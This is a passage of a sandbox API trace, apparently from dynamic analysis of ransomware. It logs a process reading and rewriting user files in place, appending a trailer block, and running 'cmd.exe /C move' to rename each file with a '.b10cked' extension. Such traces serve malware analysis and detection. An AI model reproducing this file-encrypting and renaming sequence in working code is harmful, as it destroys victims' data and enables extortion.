dwMilliseconds=0xffffffff) returned 0x0 [0217.472] ReleaseMutex (hMutex=0xf8) returned 1 [0217.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.472] ReleaseMutex (hMutex=0xf8) returned 1 [0217.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.473] ReleaseMutex (hMutex=0xf8) returned 1 [0217.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.473] ReleaseMutex (hMutex=0xf8) returned 1 [0217.473] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27426244164) returned 1 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.475] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c500, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0217.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.476] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c500*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0217.476] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0217.477] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c500, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0217.477] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0217.477] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c500*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0217.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Indexed Locations.search-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0217.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Indexed Locations.search-ms", cchWideChar=27, lpMultiByteStr=0x132f7bc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Indexed Locations.search-ms", lpUsedDefaultChar=0x0) returned 27 [0217.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8 [0217.481] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0217.481] CloseHandle (hObject=0x1b4) returned 1 [0217.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\Default\\Searches\\INDEXE~1.SEA") returned 0x26 [0217.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0217.482] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa84, dwThreadId=0xf54)) returned 1 [0217.488] CloseHandle (hObject=0x120) returned 1 [0217.489] CloseHandle (hObject=0x1b4) returned 1 [0217.489] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0217.492] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0217.492] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount1=26, lpString2="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount2=26) returned 2 [0217.492] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.492] ReleaseMutex (hMutex=0xf8) returned 1 [0217.492] WaitForSingleObject 
(hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.493] ReleaseMutex (hMutex=0xf8) returned 1 [0217.493] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.493] ReleaseMutex (hMutex=0xf8) returned 1 [0217.493] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.493] ReleaseMutex (hMutex=0xf8) returned 1 [0217.493] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0217.494] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.495] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27428411629) returned 1 [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x10b1e [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, 
lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x10636 [0217.500] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x10b1e [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x10b1e [0217.537] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.537] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.537] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0217.538] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.538] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0217.538] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0217.538] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0217.539] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0217.539] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0217.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0217.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x13286a4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Administrator.contact", lpUsedDefaultChar=0x0) returned 21 [0217.545] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ece0*=0) returned 0x10b1e [0217.545] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0217.545] CloseHandle (hObject=0x1b4) returned 1 [0217.547] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON") returned 0x26 [0217.547] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0217.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x968, dwThreadId=0xaa4)) returned 1 [0217.554] CloseHandle (hObject=0x120) returned 1 [0217.554] CloseHandle (hObject=0x1b4) returned 1 [0217.554] 